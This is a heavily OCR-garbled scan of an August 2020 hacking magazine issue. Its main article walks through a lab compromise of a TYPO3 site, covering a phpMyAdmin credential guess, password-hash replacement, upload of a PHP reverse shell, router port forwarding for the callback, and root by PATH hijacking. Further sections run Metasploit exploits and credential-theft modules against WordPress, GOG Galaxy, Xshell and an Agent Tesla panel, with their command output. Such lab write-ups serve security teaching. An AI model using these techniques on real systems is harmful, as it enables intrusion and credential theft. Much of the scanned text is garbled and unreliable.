Simplifying cyber security since a August 2020 Edition 3 Issue 8 A Unique Cyber Security Magazine aie HACKING A TARGET ON ANOTHER NETWORK WITH YOUR ATTACKER SYSTEM BEHIND A ROUTER PRIVATE BROWSING : WHAT IT DOES AND WHAT IT DOESN'T TOOL OF THE MONTH : LINUX SMART NUL Sa reUele)N| PAV UN) nT terete Tm ete] getsThen you will know the truth and the truth will set you free. John 8:32 Editor's Note Hello aspiring ethical hackers. Hoping you are all awesome and safe. We jare releasing our August 2020 Issue with lot of excitement. Since our May 2020 issue, Our readers have been learning about hacking in different Real World Sc} -enarios. In our May 2020 Issue, we covered a real world scenario where a web) \server is behind the router with port 80 accessible to external network. In our \June 2020 Issue we covered a real world scenario which involves lateral move- \ment over the hacked network. In our July 2020 Issue, we have covered how a \simple router mis configuration can expose the internal network to the internet jand can be hacked. In this Issue, our readers will see a most common real world scenario. \Many a times we find our attacker system behind a router. So in this month's IRWHS, we will place the attacker system behind a router in a LAN and hack a \system that is on a different network (internet). It is very simple to configure a \reverse shell when while both attacker and target system are on the same netw -ork but when the target is on a different network and the attacker system is be- bye a router, configuration changes. This is one of our favorite scenario as ma- y of the cyber security students have this doubt as how to hack when they are ehind a router. With this scenario, we will be covering full circle some of the most common \real world scenarios. We will be moving over to other scenarios from the next Issue. Apart from this, other regular features are present. We are sure our read-| lers will like this Issue. That's all we have for now. Until the next issue, Good |Bye. Thank You. Stay Home, Stay Safe. chchakrauanthe “tt HACKER IS SOMEONE WHO USES A COMBINATION OF HIGH-TECH CYBERTOOLS AND ‘SOCIAL ENGINEERING TO GAIN ILLICIT ACCESS TO SOMEONE ELSE'S DATA.” ~ JOHN MCAFEEINSIDE See what our Hackercool Magazine August 2020 Issue has in store for you 1. Real World Hacking Scenario : When Attacker system is behind a router. 2. What's New : Kali Linux 2020.3 and Parrot OS 4.10. 3. Metasploit This Month : Drag & Drop Upload RF, Xshell and XFtp password gather & more modules 4. Capture The Flag : Green Optic : 1. 5. Tool Of The Month : Linux Smart Enumeration. 6. Installit : Install Z shell in Kali. 7. Hacking Q&A: Answers to some of the questions our readers ask about ethical hacking. 8. Online Security : Private Browsing : What does it do and what it doesn't. Some Useful ResourcesREAL WORLD HACKING SCENARIO i, 'm Hackercool. Today | am gonna show you a scenario where our attacker system is beh ind a router and obviously the target is on another network. My router is an ipfire router with RED+GREEN configuration and the administrator credentials are "admin:iloveyou' . Just like any common router configuration, this configuration allows all the devices in the LAN to acce ks internet while protecting them from external connections. Needless to say, my attacker achine is Kali Linux. Let me check the internal IP address of my machine. Pree yy eaten Ce eee eee eee oe Be ecco) oo Link/Loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 Mera Rey eee rat) theories RU er inet6 ::1/128 scope host valid_lft forever preferred_1ft forever Pa ae Cos com at te a eC Reem eae eer cee ROT re er 3: eth1: mtu 1500 qdisc pfifo_fast state UP group defau tater) COU a rere ee Rr inet 192.168.66.6/24 brd 192.168.66.255 scope global dynamic noprefixroute eth1 Riscecet cca cor meotrs Aree Pe rune eer rae) Pitre rer rm eee he IP of my machine is 192.168.66.6. | am interested in one target IP 172.28.12.22. | chang ed the /etc/hosts as following before | start the hack.GNU _nane ra psu 127.0.1.1 pave! Pct eres CTT Cette set crn Coreetreytrry ee teat iet sy ll perform a Nmap scan on the target kaliakaliz~$ nmap ~sV 172.28.128.22 Starting Nmap 7.80 ( https: //nmap.org ) at 2020-08-27 10:48 EDT ce eee eter Host is up (@.011s Latenc eae est esd a eo ei a Ae CUCL SUP mC crcl aD) Ce eons ee ete at ee RC STS) A Uns ss eee) 8080/tcp open http Apache httpd 2.4.38 ((Debian)) Ct ues est eR SEL) Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:1inux:linux_kernel Service detection performed. Please report any incorrect results at https: //nmap.org/subm ny] ee eae RUE eee cor PAE Ses | [There are four web services running on ports 80,8000,8080 and 8081 along with a SSH serv er on the target. | opened all these webpages in the browser. |The website on port 80 is displaying a simple text "HELLO User!" lit seems the site on port 8000 is also being redirected there. [The site on port 8080 is displaying a plain page@-ce = ite running on 1 is displaying a these rabbit holes? | eed to run nikto on all the four ports. Perce eure ee Pee ee) Pca Piper erred Sra ee Cet ier ea Poet art? 55:38 (GMT-4) Server: Apache/2.4.38 (Debian) eset ear te ees kee ee UO Ue ee) Pee ee ed eee a On ar eee CC Rien emo Cae eeu erro eres noes sr No CGI Directories found (use '-C all’ to force check all possible dirs) CO eee nae re eee Pt oer On week Trier ers crest PU ree Ce eer) 1 host(s) tested tunning nikto on port 80 gave me noth Tee eee) Pre ee) ieee Peet erry cre eect ier) be tiiaadd cr Peraaetd pote eral Server: Apache/2.4.38 (Debian) eeeestcs Rage Ce ees eee ee tr ee ees ee ee eon eer eee ee cd ee meee Ce eee eR CC Re ee Cae Ue ere ee stier ee ary + Root page / redirects to: http: //typo.local +°Wo CGY Directories found (use '-C all” to force check all possible dirs) emcees rc st herman Co err or) Sname=Members_Listéfilesindex: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scri pting (xSS). http://w .cert.org/advisories/CA-2000-02.html. + 7917 requests: @ error(s) and 4 item(s) reported on remote host crestor 2020-08-27 11:01:13 (GMT-4) (104 seconds) arene Running nikto on port 8000 confirmed that this was redirecting to http:/typo.local. Nikto also caught a xss vulnerability. | am not a big fan of XSS so | decided to move further by scanning port 8080 and 8081SMD tree etl ree Pree ee) lee oa Pee ee ies) re trier eer ier) ccriiaasas cor) Pretest Prot e eLte reer mC) Pensa) ieusestC seer cc Oe as becom ee Re Ue Cua) poee ee ec ee cy + The X-Content-Type-Options header is not set. This could allow the user agent to render Ca et eee erm ee sry + No CGI Directories found (use '-C all’ to force check all possible dirs) re ae ee as RS) + /phpinfo.php: Output from the phpinfo() function was found. pS SEU a CeCe Re RCC CL eng found. This gives a lot of system information. COC ee eae + 7917 requests: 0 error(s) and 7 item(s) reported on remote host + Sete mC rr) eee ee eer Nikto v2.1.6 Le ae a Pierre Ley Ss re USEC Ie) Lerma crs rim pote rte ees) Server: Apache/2.4.38 (Debian) esse ear eee ees eer ee tr men oe eee eo) ey ie ere cd + The X-Content-Type-Options header is not set. This could allow the user agent to render Cae eure tote rst Roma airy ecg strstr Cr meaner erate wie eet) a ea eas) ee eee eres oreo ae reser eee rr myc te rete mart re Terr CURR ee oe ecm ketenes Pe ere eee rita Ce + /phpmyadmin/: phpMyAdmin directory found el eT ty aa Une era meee eee ene) etme st nes PHP Version 7.3.14-1-deb10u15 dengine ‘IS of Information But frst Tet me check the phpmyadmin. As you already know, Php myadm in is used to manage databases and database means credentials. Mypacrmin [The ports 8080 and 8081 appeared interesting to me so | ran dirb on both these ports. ere eae) Creer CRC a START_TIME: Thu Aug 27 11:14:36 2020 PCAs ers et BOM SEA Tey eee. ued Cee me sed eT U a eM St refs 7c Corte Tease Bummer Tati pseaat)) SV AsTemersie ue mcrae eet) Est ee/AsTemtrslet erat este ovis ee] sti a5 12)Pattee erect asr cies! career) CRO ad START_TIME: Thu Aug 27 11:15:21 2020 TCAs rset si Pema he Une eco med Can eee) See EU MT eM ct Yor Cre Leva TAS Re Um em colsel seit) Do aC Ret + http: //typo. local :8081/server-status (CODE:403|SIZE:277) See a Ay RCE or ae + http: //typo. local :8081/phpmyadmin/ChangeLog (CODE: 200|SIZE:27390) Re Mase Ameren ru eas oS ROU Ur Oy Ame Ui Ue CUme Mrs) pecaeret) + http: //typo. local :8081/phpmyadmin/index.php (CODE: 200|SIZE:15373) ca TCE var UBrg Asatte restr uattitscry COS tea a crlar seca) Ate ie stntisey + http: //typo. local :8081/phpmyadmin/phpinfo.php (CODE:200|SIZE:15375) ay AST emUen Yor Uys alae tiascrt)) Astrea Up eee Curse riat 3) DIRECTORY: http: //typo. Local :8081/phpmyadmin/setup/ Cramster Ure Ure Dera eMC yet une ets DIRECTORY: http: //typo. Local :8081/phpmyadmin/themes/ Dirac ey Asem tier rr Une cree Asem Cee Set seri g [After a few hits and misses, surprisingly | cracked the credentials. They are root:root. So easyKase Pettenes SOL th Sate 2) Unaracomen Soper tment etngefRepain © Waban © Mere |The TYPO3 database seems to be my way forward. In that database, | found the table be_us rs interesting. Hwee @ one © 8 ase A Niet Sere @ Ome ¢ batt woah Hine ooo lin that table, | found two user entries "admin" and “user” and an entirely new kind of hash. Th te new hash is argon2ier researching further about argonz hash, got to know that it was the winner of password ‘ashing competition in year 2015. Wikipedia says it was designed by Alex Biryukov, Daniel D inu and Dmitry Khovratovich from the University of Luxembourg. Great guys. It was designe- }d especially to withstand GPU cracking attacks and it's doing a good job of that till now. | cannot crack it but luckily | got an argon2 hash generator online. The plan is to generat-| Je a hash and replace the original hash with our newly generated hash. ano) nine * owe Choose the Right Parameters for Argon » lif this works, the new password will be "hcool”. fargon2isv=19¢e-16, t=2, p=19MT1zNDU2N=gS99UECO4HA3SSV07Z35CWNg@oce = [The hash is changed. The only thing left is where to login. Dirb showed that ports 8080 2 8081 don't have any login pages. Let's try port 80. era al cee iery CRC START_TIME: Fri Aug 28 05:21:13 2020 Te As el WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt Cee ese ~ Scanning URL: http://typo.local/ ---- RUA mi RO Re ae art) Ista As emer erget eC ae casei) http: //typo. local /changelog (CODE:403| SIZE:275) http: //typo. Local /ChangeLog (CODE:403|SIZE:275) sep emcec amt Beats) tise t) //typo. Local /en (CODE: 200 | SIZE:663) ACM Ae CTE Ug astay Asteece Ate cclar te pactatt) // typo. Local /LICENSE (CODE: 403|SIZE:275) http: //typo.local/php.ini (CODE:403|SIZE:275) http: //typo. local /production. log (CODE:403| SIZE: http: //typo. local/readme (CODE:403|SIZE:275) ASM Ua tem cat eter) http: //typo. local /README (CODE:403|SIZE:275) http: //typo.local/server-status (CODE:403|SIZE:275) http: //typo. local/spamlog. Log (CODE:403|SIZE:275) Sty emCr te MCs S cari} http: //typo.local/TODO (CODE:403|SIZE:275) eee tsa SEM ST ASN ed ea ems CSS era STS etsy http: //typo.local/WS_FTP.LOG (CODE:403|SIZE:275) SU a ath Pe per Ce ae http: //typo. local/fileadmin/akeeba.backend. log (CODE:403|SIZE:275) ESTAS eAe teers Weiner eee te)7 port BO, there Is a directory with the same name as the database (typos) I have modified pening this in the browser took me to the login page P03 On trying the credentials "admin:hcool”, | got access successfully. eer he target is running typo3 CMS version 10.3.0. Searchploit did not give me any exploits rela ted to this version of typo3. kali@iali:-$ searchsploit typo3 pre esc ear orl Ee Paar iyesseuceead eee eer se meet Venera Typos 3.5 bS - ‘Translations. php' Remote File Inclusio | php/webapps/22298.txt eee eee eR tm te eerste ee eee re aC ec tn tree mes ryerert eat Typo 3.7/3.8/4.0 - ‘Class.TX_RTEHTMLArea_PI1.php’ Mul | php/webapps/29300. txt ieee ee eee oe ert wae eam erstrryt et aos DIRE R Rt Re ee ees ee eC mrt ey TYPO3 CMS'4.0 - ‘showJid' SQL Injection Diverse asad ‘Typod CiM#_LinkList 1.4.1 Extension - SQL Injection php/webapps/25186. txt gmc ra en eee Me cs eas ML esl SveLel eens Type3 Extension JobControl 2.14.8 - Cross-Site Scripti | php/webapps/34800. txt este a ee ener esr etst ty Divealiateeemen acest eee ae co eastay ST yesseyetr aay Re CRA eet ea cat memes yr ass Port CRs een test att oer men CST ihy ent yer mongjth no known exploits, | decided to research about this CMS In google and also on the inter face. user_upload Configuration SGLOBALSCTYPO3_CONF_VARS! (Global Coniguaton) lHere, there is a blacklist of fle extensions that are prevented from being uploaded to the web site. The file extensions php, phpsh, phtml, pht, phar etc cannot be uploaded(3-1 psn tap phar onal 8). laybe if can make changes to this blacklist, 'can upload a php webshell on the target. This an't be changed from here. On searching | found Installation wide configuration in settings tab. —" a <="Configure nstalaton Wide Options [Rey DenyPanern| = to sPptpsNpHEarHIN ve contgurson || Tog First thing | do is just change the initial part of the blacklist. | am rather a patient learner.So w henever | encounter something new (TYPO3 CMS), | just try different things just in case it pr} Loves handy in future hacks. Configure instalation Wide Options. (We yeneckstoreatecorastoose} 18 {Be MDenyPatern) =n 8PBMOSNpHrUPEDNarSTeN (werteteraces}- basen SS I | tooo lLet me see if we can upload _a php file now.nough experimentation. This time | removed the whole blacklist and tried to upload the test file. => eeeie upload Is si ee set_time_Limit (0); ust like many of my previous hacking attacks, we need to assign the attacker IP address in the web shell kaliakali:~$ ip a TC em ne eee oe ee eo Bo ee eae Cue) rr Link/Loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred lft forever UMS ere asd valid_lft forever preferred_lft forever Os ee cOs Mt we TBC Re Umm eT arcs) Link/ether 08:00:27:65:58:cd brd ff: ff: ff: FF: ff: FF 3: eth1: mtu 1500 qdisc pfifo_fast state UP group defau tarts) Link/ether 08:00:27:52:48:e1 brd ff: ff: ff: ff: ff: fF Tie CRC MM ORC RE CO CEL Stoo m is! Mi CsGecur a oc masotn ree Pe ini ees men ered valid lft forever preferred_lft foreverll save the shell with hcoolshell.php and successfully uploaded it to the target. a omaei a ox rem = or fase olalie = a Bem Pmaelils Gx mena 6 1B hcoolshell.pip [Uie: 7] Fae ty ext Marhed as minsng Ne ene Toe sua Its storage is in fileadmin which also made a constant appearance while running dirb.soe Ke Langage eta ey Not Found Ihe requested URL was not found on this server. Apache/2.4.38 (Debian) Server at typo.local Port 80 Finally when | found the shell, | got an error saying that the web shell failed to daemonise as the network was unreachable. WARNING: Failed to daemonise. This is quite common and not fatal. Network is unreachable (101) [The netcat listener | started prior to executing the web shell is just as itis. Pate on [any] 1. From here on follow carefully. This is where the REAL WORLD Scenario changes. See the i- jmage below to understand the network of this scenario. 172.28.128.19 IPfire Router DLL see soscesinre mane INTERNET vn dl 192.168.66.6 Attacker System Js already told, our attacker system is part of a LAN with IP 192.168.66.6 and our target web site is on internet with IP 172.28.128.22. In the PHP-reverse-shell | uploaded to the target, | specified the IP address as 192.168.66.6. Forget about this IP the target doesn't even know here to search for this address. Hence when | execute the shell, it says network is unreach- jable. So what is the solution when the attacker system is behind a router.Te Solution 1s configuring port forwarding on the router. So Tlogin into the router and create a new firewall rule. & ipfire.localdomain [a a eR Ye NC Frewell ules u Ithough in this scenario,! am showing IPfire router, the process of configuring port forwardin g is almost same in all routers or just slightly differentjere’s how the default firewall rule looks like. Firewall Rules Source source address ACHP address networ: Firewall au . Standard networks: Any . NAT Use Network Adress Wanton (NAT) Destination Odestnation addres IF addres or network) Firewall A a Standard networts: Any ¥ Protocol ay ‘or my port forwarding rule, | change the source to any standard network so that a machine m any network can find it. Then | enable NAT and that too Destination NAT. | set the desti-| tation IP address to 192.168.66.6. Source Source address MACAP adress. retwor Firewall au ¥ (Distandardnetwors: Amy a NAT Use network address Wanslation (NAT) 0 oestination war (Port forwarding) Feewal intertace: - Automatic - . ‘Source WaT Now source WP address: GREEN (192.168,66.1) . Destination (mnt ra tre vremet | 5ine Tast thing, | change the protocol from “all” fo "tcp" and specify destination port and exter- nal NAT port as 1234. | leave a remark to this firewall rule as "incoming reverse shell" and sa ve it. Protocol & ipfire.localdomain Frrewall Rules lin summary, what | am configuring here is that any machine that makes a connection to port 11234 of Ipfire router to be forwarded to port 1234 of my attacker system. Since there is no wa -y of my target knowing the IP address of my attacker system, router's IP address should be 7, “ a y poet VERS mae ee eee set_time_limit (0) AadISo | create a new shell named hcoolshell2.php having IP 172.28.128.19 (router's IP address) and port 1234 (port forwarded to 192.168.66.6, my attacker system). Then | upload the new Ishell to the target. any ee) WARNING: Failed to daemonise. This is quite common and not fatal. Network is unreachable (101) his time | successfully have a shell on the target kali@kali:~$ nc -lvp 1234 cece UCL emery) Case M eC MCR MSM MoT MCU er eCL ere EL Sed Linux typo 4.19.@-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux 16:22:38 up 1:34, @ users, load average: 0.00, 0.00, 0.00 rs ag od rot ee eee He me tC eon eer teeKlie ne tsp) SOP ee ee Re ag raerre yy Ce) Pert SUE ere $ uname -a Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux st his is a shell with limited privileges. So | need to escalate privileges. | will use a new tool na Imed Linux smart enumeration to help me in privilege escalation. So | clone it into my attacker machine. But I need to upload it to the target. So | start the python web server on port 8000 jf my attacker machine. kaliakali:~$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 80000 on router, forward port B00 also to my attacker machine, Frewall Rules Source wddress (MACAP address or network vee a . O standard net any . NAT (use netner Address Ransltion (NAN © vest . (remet ntutoce/ SE - Protocol Tp v Firewall Rules Firewall Rules 8 Protec Source tog Destination sation ie ” a le low | can download the linux smart enumeration script to my target. Few eras H/eUe eC Pet LPC Ae ia CLT Eom sl 9/6 Ue eel Boel eC Er! su ROU ete CH Peace Pacer Se eee restr eer ce eee Be Length: 37926 (37K) [text/x-sh] tree ee 2020-08-28 16:49:04 (11.8 MB/s) - ‘lse.sh' saved [37926/37926]binaries with SETUID bit set. $ chmod 777 1se.sh Pace) eR eC ee merce iors LSE Version: 2.5 a] cry rd) /usr/local/sbin: /usr/local/bin: /usr/sbin:/usr/bin:/sbin:/bin rT) ST 4.19.0-8-amd64 see eure CMe ec tS) rer Binaries with setuid bit Vee Ons /usr/local/bin/apache2-restart As ets One of them is a php script and another a linux executable. enteral Up ees ato TUL meee CMs Ree ee ee Ce eC UBMCO MIC MmeU Meu omar aC acute aan 2, for GNU/Linux 2.6.18, BuildID[sha1]=7f141086cfbe35713b5871941d2db74795d89ab Aarts ys PR etCw at SU rts /usr/local/bin/phpunit: setuid, setgid a /usr/bin/env php script executable (bi Chiari) hese cannot be edited. | was not interested in the PHP script. So i focused on apache resta rt binary. Running strings command shew me something interesting stra ray u errs Arata eet eres re ae eter) peerrrst) peererit system materia Tu Cerrar ie a ae fFFFF. WL coien Po eet eureTere 1s a command service apachez start, The service command is being used in this binar This may be my only way to escalate privileges. | will create a new instance of service file lin the tmp directory with command /bin/bash which will give us a new shell. Then | will add th ¢ tmp dircetory to PATH. This method is known as PATH privilege escalation. Since the service command is part of the /usr/local/bin/apache2-restart binary which can be run as root, executing this will give us a shell with root privileges. $ pwd /tmp Stee SOY ead cacy ieee service $ chmod 777 service PRS aU A ES ed $ /usr/tocal/bin/apache2-restart ero root [aed import pty;pty.spawn("/bin/bash") SS AST PTL y rg rootatypo:/tmp# pwd rr ner) root@typo:/tmp# cd /root [srl rootatypo:/root# 1s cy Paes erro ae eae aed Prarriieess mead eM set iat eT Omer ee Creat aad rootatypo:/root# ff WHAT"S NEW Kali Linux 2020.3METASPLOIT THIS MONTH lelcome to the August 2020's Metasploit This Month feature. Let us see the latest exploit m- jodules of Metasploit. Drag & Drop Multiple File Upload - Contact Form 7 Pre-auth RCE Module [Drag and Drop Multiple File Upload plugin is a wordpress plugin used in conjunction with Co Intact Form 7 plugin to upload multiple files. It has over 20,000 active installs. All the above m entioned versions of this plugin are vulnerable to remote file upload vulnerability. This plugin controls uploads by a file extension whitelist. However this whitelist can be bypassed by app- lending "%" without double quotes to the file name at the end. This good thing is this module does not require authentication. This was tested on plugin version 1.3.3.2 installed on wordpess 5.4 with Contact Form 7 plugin. The download information of the vulnerable software is given in our Github repository. [Both these plugins are activated. Let's see how this module works. Load the module as show n below, Sees cy a eee) Pee er em) Poi e Cesta a ee ee rsd Module options (exploit/multi/http/wp_dnd_mul_file_rce): cro Tee mC Me astistay erty cy Une eS ee ere Tr roasie Eros Cs OMe Rec ECs oa) mC CSC arte el ry Se eae are)) SSL rate Negotiate SSL/TLS for outgoing connections TARGETURI / cams rey riod Dermot ros OCR StIRC cai me oe Psa me sts ae Cerny Oe ou CIRC a meat) emery io Lire cs Cte c cco Cesta cs msf5 exploit(multi/http/wp_dnd_mul_file_rce) > lfet the required options and check if the target is vulnerable or not. SSO Ce ES TEES TTT) Priest eC ee) erro Cmts eee ee ce tay targeturi = /wordpress5.4 gsf5 exploit(multi/http/wp_dnd_mul_file_rce) > check 192.168.36.148:80 - The target appears to be vulnerable. msf5 exploit(multi/http/wp_dnd_mul_file_rce) > hen execute the module as shown below. CSTs Creer Cee ee eeu ue nest Cetera er pet ets Found version 1.3.3.2 in the plugin 192.168.36.148:80 - The target appears to be vulnerable. msf5 exploit(multi/http/wp_dnd_mul_file_rce) > run See Re Crue CeCe trerr ry Getting nonce Pree rity eee reueo ere aCr) CUR ere estate ee ORs Sending stage (38288 bytes) to 192.168.36.148 Meterpreter session 1 opened (192.168.36.132:4444 -> 192.168.36.148:43746) at 2020-08 Pert meri) Pater meres ec) Praca eae UL or Cs ete eC ee see Te ewe eee Cre ye Lae oe) my Parsee cued Pai cote) evra te Lee) ose | his should give us a meterpreter session on the target as shown in the above image. GOG Galaxy Client Privilege Escalation Module OG Galaxy is a video game management client for Windows and MacOS. All the above me tioned versions has a privilege escalation vulnerability. This is because one of its Windows services "GalaxyClientService" runs with SYSTEM privileges. This module communicates wi th this service and instructs it to execute commands as SYSTEM. Let's explain how this module works. We tested this on GOG Galaxy Client software version {2.0.12 installed on Windows 10. Since this is a privilege escalation module, we need to get a session on the target first. This session can be of LOW privileges as shown in the image givePoem tse »> msf5 exploit( eeu Se Re Ce eC eer Sei es OM Cee Cee) Meterpreter session 2 opened (192.168.36.132:4466 > 192.168.36.129:49782) at 2020-08 Pre reer] Pree ees) Computer eter sty CS : Windows 10 (10.0 Build 17134). eters ee) meu eam) rey Porc eee at ee Uy Pattee ott) ar ey Peer soe u prereset Background this session and load the gog_galaxyclientservcie_privesc module eT] Correctly msf5 exploit(: ) > search gog_galaxy Peso ey # Name race e ag ae rost ist) Poe yy 0 atte eC meer) Se Reet Cc toe etic erste) Poem cot ) > use exploit/windows/local/gog_galaxyclientservice_privesc PS eee ep mes) msf5 exploit( em stiry Module options (exploit/windows/Local/gog_galaxyclientservice_privesc): cro Tsu a re me ast ec rn) Ped yes oe oe BoC oe scene Crs Pe Uma te etm st eats Me Rte CSCC ca me cro Te MC Mast iS eat eed ey rte CCRC Cece ) the required options and check if the target is indeed vulnerable. Pare te eee! session = 2 pee werortc eae) errr ee) Perera tats ex Leer eee oc ee mats Cer Premera ee |fer all the options a PST ee ee) rise etre ete) msf5 exploit( eer SM aCe Cee erry Rest acitsrarta cate aceite Connecting to service ... eG eeu eer ome cid Cat erat crue ce Sending stage (176195 bytes) to 192.168.36.129 OMe mr ete itg) Pee stue Me MeU RCS Per eee ORC tH EOE Pre tH ar mers Psi wee ranean ea ert Beteraretar > getsysten got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)) meterpreter > sysinfo Perit Peery AJ 2 Windows 1@ (10.@ Build 17134). eet ere) pent ene Rete Bea ere ree Peete eta poceriseretaeg | his should give us a meterprete with SYSTEM privileges on the target as shown in he above image. Serre yy Cry es Cue es msf5 exploit( ere Pastrers try Id Name Type Information Connection 2 Se Ue Ot UR ae Omer Ce peer Metre etre Met el eet )) fy er a Uae Eee sO CeCe peer Mere eT Setrie to Metis U el Serr) Poem Cc don POST Xshell and Xftp Gather Passwords Module ET: Xshell and Xftp TYPE: Local ANTI MALWARE : ON shell and Xftp are Windowss based SSH and FTP clients respectively made by netsarang. upports SSH, SSH2, SFTP, TELNET and RLOGIN protocols. Both Xshell and Xftp use Xmanager to encrypt their credentials. This module reverses the encrypted credenti als and reveals them. However this will only work when the user chooses to remember the username and password. Just like every POST exploit, this one needs a meterpreter session lon the target. Let's see how this module works. We have tested this on a Windows 10 target with thelatest version of Xshell installed. Let's set the target first. Install Xshell on windows 10 target. iStart the SSH server in Kali Linux to connect from the Windows 10 target. ¢ eore OO Pett Oma me) msf5 exploit( erate meee Tae eee eer Poreatets eer) esse erty msf5 exploit( eer Started reverse TCP handler on 192.168.36.132:4466 Ue CORR ORCC) Meterpreter session 4 opened (192.168.36.132:4466 —> 192.168.36.129:49738) at 2 ern Pa i) Core ste ee msf5 exploit( er art erie eee) msf5 post( mst DCR St IRCrt ey, err Cee aD Tae MC mossy) One) ee as Srey Ts) esc) ese eT Ree Cros Pema ee | msf5 post( ens stews Para ea Gather Xshell and Xftp Passwords on DESKTOP-U061SVS PRC Res ee ec ea peta eos) Sa Mcrae rs ee Ce mC Ce eer ee ace N kali eres ro) Psticet osm areieo stent) [+] Passwords stored in: /home/kali/.msf4/Loot/20200823060249_default_192.168.36.129_host Rr ertrmsty Post module execution completed Dee rac don his will get us the credentials of xhell or xftp installed on the target. Agent Tesla Panel RCE Module TARGET: Agent Tesla Control Panel TYPE: Remote ANTI MALWARE : ON Agent Tesla is a password stealing malware which has been around since 2014. However itjas gained popularity in year 2078 for Its easy to use interface and powerful operation. By ye ar 2018, Agent Tesla subscription service had around 6300 paid subscribers. Just like other RAT malware, even Agent Tesla has a control panel to manage the functions of the malware installed on different systems. This module exploits a command injection vulnerability along ith an SQL injection vulnerability and a PHP object injection vulnerability to execute code o- the target system remotely. All the versions of Tesla Control Panel prior to year 2018 can be exploited without authentication whereas tesla control panel software after year 2018 nee- i authentication for exploitation. This module only works on panel software running on Windo ws. lLet's see how this module works. We have tested this on a Windows 10 target with Tesla con trol panel version 13.7. This panel software was hosted on WAMP server (version 3.2.2) wit- php version 5.6.4. The download information of the vulnerable software is given on our Git- ub repository. Let's see how this module works. Load the agent_tesla_panel_rce module as hown below. msf5 > use exploit/multi/http/agent_tesla_panel_rce Peace tenon om) Pare Oh Cutter em mer a roi eC Module options (exploit/multi/http/agent_tesla_panel_rce): cry Current Setting Required Description ee) ry ee Ree Oe eton h Ce no me ORC Tet ese corsa RHOSTS yes The target host(s), range CIDR identifier, or ho eeu Metco nr) yes MOMs aaa Ss) ee cry cry Preset eer ou Recast TARGETURT /WebPanel/ a Loe ee eee aera ime CR cy Cera Meg ry Ce eRe CRs Pr no Dr omeG a rd CC SCC ca mc ecu Mo uC Mss The Listen address (an interface may be specified) fer meres cette ues od Pots tg Cy Automatic (PHP-Dropper) asf5 exploit(multi/http/agent_tesla_panel,‘at the required options and check I the target Is vulnerable or not and check The target is lindeed vulnerable or not. PERT OT eT IST cree eC eee msf5 exploit( Pee ty reso er Permits Pea ey Cre meet ot) Pere ytac eae 192.168.36.1:80 - The target is vulnerable. Poem atets mei eer) ise Cer) prem tats don hen execute the module. Perera Ee rrr ee IEry) Urge ey Pe ELISE] Peer atts ea OC Ro Rca Ome eerie Set eee CC ms et ie ist oR ker eed Ome ee eee eT) ORR ee ee Rete NC Lar C as Tiel Corey [Oe Re Om ee eel OR owes Cea Ren e er i ee One ete Te ee) ER a tee rr) PR ee ere mac Rea kN UNC amelie Dee MO is Priest aed Deleted C:\wamp64\wu\\WebPanel\\server_side\scripts\.£FuDaaPZqi.php Paes eeu) ood Cry Cs 10.0 build 18362 (Windows 10) AMD64 eee eu Paes it) Server username: SYSTEM (0) meterpreter > As you can see, this will give us a meterpreter session on the target as shown in the above i- Image WHAT"S NEW Parrot 4.10GreenOptic : 4 Y CAPTURE THE FLAG You may take numerous courses on cyber security and ethical hacking but you | ‘will not hone your skills unless you test you skills in a Real World hacking environme nt. CAPTURE THE FLAG scenarios and VM labs provide the beginners and those wh- |o want a real world testing lab for practice. These scenarios also provide a variety of |challenges which help readers and users to gain knowledge about different tools and jethods used in Real World penetration testing. These are not only useful for beginn- rs but also security professionals, system administrators and other cyber security nthusiasts. We at Hackercool Magazine strive to bring our readers some of the best CTF scenarios every month. We suggest our readers not only to just read these tutori -als but also practice them by setting up the VM. Like other articles of our magazine, this article too has been written so that it is easily understandable to beginners. To make this more simple, this article has been \ replayed as a challenge being performed by an amateur hacker. SA) |Hi Hackercoolians. Welcome back. Hope you are all safe and taking all the safety precaution s to keep the Covid 19 virus away from you. GOD keep you all safe and sound in the current, risis. In our present Issue, | bring you the CTF challenge of Green Optic : 1. This machine is uuthored by " Thomas Williams". The author who rated it as "Very Hard” also mentions that designed this machine to be very realistic. He says that everything you experience in this achine will be in Real world. He also suggests us that enumeration is the key for solving his CTF machine. The machine can be downloaded from the given link below. https://www.vulnhub.com/entry/greenoptic-1,510/ [This machine is working fine in both Virtualbox and Vmware and it is set to get IP address iutomatically as DHCP is enabled. The author also suggested to use this with Host only ada- ter as this deos not need any internet. | used two attacker machines which are various versi ons of Kali Linux. The reason | did this will be known while you go through the challenge The story behind this machine is like this. "British Internet Service Provider GreenOptic ‘as been subject to a large scale Cyber Attack. Over 5 million of their customer records have een stolen, along with credit card information and bank details. GreenOptic have created an incident response team to analyze the attack and close any security holes. Can you break into their server before they fix their security holes?” So let's start having fun. After booting the target machine, the first thing | do is network scanning with Nmap to find the IP address of my target. This | do using SYN PING scan of imap. $ sudo nmap eee Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 08:48 EDT ee es Cet ttre) PO ues eesti eT) ORT eer t Starting Nmap 7.80 ( https: //nmap.org ) at 2020-08-24 08:48 EDT ee geet ee) Perera eC eee rss) MAC Address: 00:0C:29:7A:FE:2E (VMware) eee ae Seed